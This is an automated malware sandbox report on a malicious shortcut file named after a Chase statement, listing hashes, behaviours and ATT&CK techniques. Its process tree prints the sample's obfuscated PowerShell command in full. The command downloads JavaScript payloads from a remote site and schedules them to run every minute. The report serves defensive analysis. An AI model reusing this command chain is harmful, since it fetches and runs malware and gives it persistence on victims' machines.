Analysis
-
max time kernel
41s -
max time network
40s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
18/04/2025, 17:49
Static task
static1
Behavioral task
behavioral1
Sample
chase_apr_2025.lnk
Resource
win10v2004-20250410-en
Behavioral task
behavioral2
Sample
chase_apr_2025.lnk
Resource
win11-20250410-en
General
-
Target
chase_apr_2025.lnk
-
Size
1KB
-
MD5
36a9f6a6fe333f902077a73d990f0a4e
-
SHA1
906818153a8ff4bf10cfb8615ff6b9021140623c
-
SHA256
09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43
-
SHA512
cfc907e28c5069edc9e837b53f13377fbc015e1baba7401d1f3adb0bbdefa1dc95b830da58ef3b84e07ef8e8558d0b9b593e3d5c4c0d258cb50f0c8c73d5f5c7
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 4204 powershell.exe 14 4204 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2645532622-3298555945-705856666-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 4204 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4704 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4204 powershell.exe 4204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4204 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 112 wrote to memory of 4204 112 cmd.exe 87 PID 112 wrote to memory of 4204 112 cmd.exe 87 PID 4204 wrote to memory of 4776 4204 powershell.exe 94 PID 4204 wrote to memory of 4776 4204 powershell.exe 94 PID 4204 wrote to memory of 4704 4204 powershell.exe 97 PID 4204 wrote to memory of 4704 4204 powershell.exe 97 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php3⤵PID:4776
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s3⤵
- Scheduled Task/Job: Scheduled Task
PID:4704
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s1⤵PID:1348
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
161B
MD56f2c98b320a97239e18b95658d60ac75
SHA119b01f664642846c84e02cf0c07a61d4bf8785cd
SHA2567729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166
SHA512c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82